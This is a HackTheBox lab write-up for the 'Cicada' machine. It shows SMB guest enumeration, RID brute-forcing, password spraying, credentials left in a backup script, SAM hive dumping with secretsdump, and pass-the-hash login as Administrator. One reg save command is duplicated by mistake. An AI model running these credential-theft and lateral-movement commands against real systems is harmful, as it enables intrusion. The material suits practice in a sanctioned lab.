Featured image of post Cicada
Hackthebox

Cicada

Hackthebox

Inital access

From the nmap scan we can see that there are mutliples ports open. In this case we will focus on the port 445 (smb):

nmap_scan

Using smbclient we can list the shares available:

1

netexec smb "10.10.11.35" -u guest -p '' --shares

shares

Using the following command, the list of the readable shares is returned:

1

netexec smb "10.10.11.35" -u guest -p '' --shares --filter-shares READ WRITE

shares_filter

Using smbclient we can access the share HR:

1
2

smbclient -no-pass guest@10.10.11.35
use HR

HR_share

The file Notice from HR.txt can be retrieved and contains the following information:

Dear new hire!

Welcome to Cicada Corp! We’re thrilled to have you join our team. As part of our security protocols, it’s essential that you change your default password to something unique and secure.

Your default password is: “PASSWORD”

To change your password:

  1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
  2. Once logged in, navigate to your account settings or profile settings section.
  3. Look for the option to change your password. This will be labeled as “Change Password”.
  4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
  5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don’t hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards, Cicada Corp

A password is indicated but no username is provided. The following command can be used to list all available users:

1

netexec smb 10.10.11.35 -u guest -p "" --rid-brute | grep "idTypeUser"

users

The output of the command is saved to a file and the following command is used to extract the usernames:

1

sed -E 's/.*CICADA\\([^ ]+) .*/\1/' users.txt > usernames.txt

The following command is used to test the password with the found usernames:

1

netexec smb 10.10.11.35 -u usernames.txt  -p pass.txt

michael

The account of michael.wrightson is found to be valid. Listing all the users with the found account, information about the user david.orelious is found:

1

netexec smb "10.10.11.35" -u 'michael.wrightson' -p pass.txt --rid-brute --users

david_password

Using the same command as before, it is possible to see that david has access to the share DEV:

1

netexec smb "10.10.11.35" -u david.orelious -p david_pass.txt --shares --filter-shares READ WRITE

DEV

Using smbclient, the share DEV can be accessed:

backup_script

The content of the retrieved file backup_script.ps1 is the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

The credentials of emily.oscars are found in the script. The credentials are those of a local user. It is possible to access emily’s account using Evil-WinRM. The first flag is found in the Desktop of emily’s account:

user_flag

Privilege escalation

Using whoami /priv the following information is found:

priv

This privilege allows the user to retrieves the system hives. The following command is used to retrieve the hives:

1
2

reg save hklm\sam sam.hive
reg save hklm\sam sam.hive

hives

After the hives are retrieved, secretsdump is used to extract the hashes:

1

secretsdump -outputfile dump.txt -sam SAM -system SYSTEM LOCAL

hashes

With the hash of the user Administrator, it is possible to use Evil-WinRM to access the account:

1

evil-winrm -u administrator -H 2b87e7c93XXXX -i 10.10.11.35

The root flag is found in the Desktop of the Administrator account:

root